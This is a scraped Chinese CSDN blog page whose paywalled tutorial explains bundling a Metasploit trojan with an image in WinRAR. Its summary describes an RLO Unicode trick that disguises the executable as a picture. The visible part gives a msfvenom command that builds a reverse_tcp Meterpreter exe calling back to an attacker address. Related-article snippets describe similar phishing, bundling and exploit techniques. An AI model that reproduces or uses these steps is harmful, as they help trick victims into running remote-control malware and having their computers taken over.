网络安全-解密WinRAR捆绑恶意程序并自动上线MSF的原理

最新推荐文章于 2024-07-10 16:14:01 发布
最新推荐文章于 2024-07-10 16:14:01 发布
阅读量5.3k 收藏 33
点赞数 9
分类专栏: 网络安全 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xueshenlaila/article/details/121335462
版权
本文详细介绍了如何使用WinRAR捆绑恶意程序和图片,并通过设置自动运行来实现。利用Unicode字符修改文件名后缀,伪装成图片以欺骗用户。当受害者打开伪装的图片时,恶意程序会自动运行,从而成功连接到MSF(Metasploit Framework),实现远程控制。
摘要由CSDN通过智能技术生成

文章目录

生成伪装恶意程序的封面图标

需要安装rar压缩工具。
WinRAR官网:http://www.winrar.com.cn/
下载安装即可不需要特殊配置。

msfvenom生成exe

┌──(root💀xuegod53)-[~]
└─# msfvenom  -p windows/meterpreter/reverse_tcp  LHOST=192.168.1.53 LPORT=4444 -f exe -o /var/www/html/dongman.exe

准备一张图片
在这里插入图片描述
图片生成ico图标用于恶意程序的封面图标:http://www.ico51.cn/
注:图片尺寸选最大的,也可

最低0.47元/天 解锁文章
极客事纪
关注
专栏目录
2022全国职业技能大赛-网络安全赛题解析总结①(超详细)
Aluxian_的博客
05-11 1万+
2022全国职业技能大赛-网络安全赛题解析总结(自己得思路)模块A 基础设施设置与安全加固(20分)模块B 网络安全事件响应、数字取证调查和应用安全(40分)模块C CTF夺旗-攻击(20分)模块D CTF夺旗-防御(20分) 模块A 基础设施设置与安全加固(20分) 一、项目和任务描述: 假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录安全加固、数据库安全策略、流量完整性策略、事件监控策略、防火墙策略、IP协议安全配置等多种安全策略来提升服务器系
文件捆绑
10-27
简单实用
winrar捆绑软件
shuxingcq的博客
03-15 4610
常见的cpa静默包玩法通常是捆绑在某软件上,用户打开则一起运行(cpa静默包在后台运行安装),但是多数捆绑方法都会将捆绑后的软件报毒,而一般站长又都不会做免杀,就导致了通常静默包通常只用于捆绑一些本来就报毒的软件,譬如游戏外挂此类。然后通过文字引导用户关闭杀毒软件,达到“免杀”的效果。采用winrar(免杀)实现软件的捆绑,这样的捆绑对于绝大部分的普通用户还是很有迷惑性的,但是细心一点的就能发现问题
WinRAR捆绑图片,恶意程序自动上线Cobalt Strike
最新发布
weixin_57176859的博客
07-10 444
CS:Cobalt Strike 一款以由美国redteam团队,研 发出来的一款以Metasploit为基础的GUI框架 式渗透测试工具。1、使用 Unicode 字符修改文件名后缀,右键 - 重命名 - 再次右键 - 插入Unicode - 控制字符 RLO。选择一张jpg格式的图片,选择512*512生成ico图标并生成。选中生成的ico图片和生成的木马——>添加到压缩文件。端口:在CS启动的时候可以看见端口号:50050。用户:为登录之后给别人看的名字,任意写。密码:为之前设置的密码,123。
实战WinRAR捆绑图片和恶意程序自动上线Cobalt Strike(cs钓鱼日记)
guanjian_ci的博客
05-13 1114
情景:在钓鱼事件中,想要利用cs.exe木马上线cs,但是cs.exe命名太过于显眼,即使业余人员也会有防备心,本篇文章将cs.exe命名进行一定的隐藏,最终生成:猫咪exe.jpg。
rar压缩文件捆绑至图片上
weixin_30528371的博客
05-13 223
最早看到这个的是在高一,当时钱程在空间里放的图片,下载之后,后缀改成rar就变成了压缩包,解压缩之后是一首歌“十年”。 一直没去弄明白,今天可算尝试了一下。 方法: 1、准备一张图片例如1.jpg和将要合并入图片的压缩包例如1.rar; 2、把他们放入同一个文件夹中,例如D:\ww; 3、打开cmd.exe,进入该文件夹 例如d: 进入D盘, cd ww 进入此文件夹; 4、输...
利用CVE-2021-40444漏洞钓鱼执法上线MSF
include_voidmain的博客
03-31 3303
0x01 漏洞描述 2021年9月8日,微软官方发布了关于MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。 Microsoft 发现,存在尝试通过特别设计的 Microsoft Office 文档利用此漏洞的针对性攻击。攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后,攻击者必须诱使用户打开此恶意文件。 0x02 漏洞
2023年内蒙古自治区中职网络安全赛题-B模块
06-01
《2023年内蒙古自治区中职网络安全赛题-B模块详解》 网络安全是现代信息技术领域的重要组成部分,尤其在职业教育中,网络安全技能的培养至关重要。2023年内蒙古自治区的中职网络安全比赛,旨在考察参赛者对Web安全...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
rar高级捆绑解压脚本命令
08-01
rar高级捆绑解压脚本命令rar高级捆绑解压脚本命令
ATT&CK防御绕过-木马隐藏捆绑技术-winrar解压和文件名反转
u013797594的博客
05-09 3081
ATT&CK防御绕过-木马隐藏和捆绑技术-winrar解压和文件名反转
解压捆绑木马上线
weixin_44747030的博客
04-05 2967
解压捆绑木马 使用CS生成一个木马文件将木马跟一个正常的文件捆绑在一起,当点捆绑生成的EXE文件就会执行木马和正常的文件。 选中木马文件和一个正常的文件,选择添加到压缩文件 常规-勾选创建自解压格式压缩文件并修改压缩文件名 高级-点击自解压选项 常规-填写解压路径 设置-填写解压后运行的路径,一个为木马文件的名字一个为正常文件的名字。 模式-全部隐藏 更新-解压并更新文件-覆盖所有文件 最后点击确定,生成一个Desktop.exe的文件 这个文件的图标可以使用ResourceHacker进行
WinRAR捆绑木马
超哥的专栏
04-23 4030
准备好木马文件 server.exe 准备一个小游戏 趣味数学计算 压缩 创建自解压格式压缩文件 自解压选项设置 解压路径设置 设置程序 模式设置 压缩完成 使用 开始玩游戏 ...
红队之社工钓鱼winrar解压捆绑
大雾
10-14 375
上线成功。
[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑
2301_77111744的博客
07-01 840
【[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑。-- 连接WLAN网络和断开连接 -->-- 新建/修改/删除通话记录 -->-- 读取手机状态和身份 -->-- 查看WLAN连接 -->-- 接收讯息(短信) -->-- 请求忽略电池优化 -->-- 修改您的通讯录 -->-- 拍摄照片和视频 -->-- 查看网络连接 -->-- 修改系统设置 -->-- 读取通话记录 -->-- 防止手机休眠 -->-- 读取联系人 -->-- 发送短信 -->-- 拨打电话 -->
网络安全之Metasploit使用
qq_52074678的博客
05-05 3394
1.Metasploit-介绍 Mltasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞,攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metaspolit框架可以从一个漏洞扫描程序导入数据,使用关于有洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击,有效载荷在发现漏洞之后开发一种可行的攻击方法。其用于提取本地系统密码,安装其他软件或控制硬件的模块,这些功能很像以前的BO2K等工具所具备的功能。 2.Ubuntu安装msf 环境准备
网络安全:制作 windows 和 linux 客户端恶意软件进行渗透
weixin_46035615的博客
04-21 5433
制作 windows 和 linux 客户端恶意软件进行渗透(拿到权限后开启屏幕共享 开启摄像头等等)
MSF和Unicorn的信息安全应用及实战
MSF 及 Unicorn 的介绍及用法 MSF(Metasploit Framework)是一种开源的渗透测试框架,主要用于漏洞扫描、渗透测试和自动化攻击。 Unicorn 是一种基于 PowerShell 的后门工具,能够在目标系统上创建一个后门,以便...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值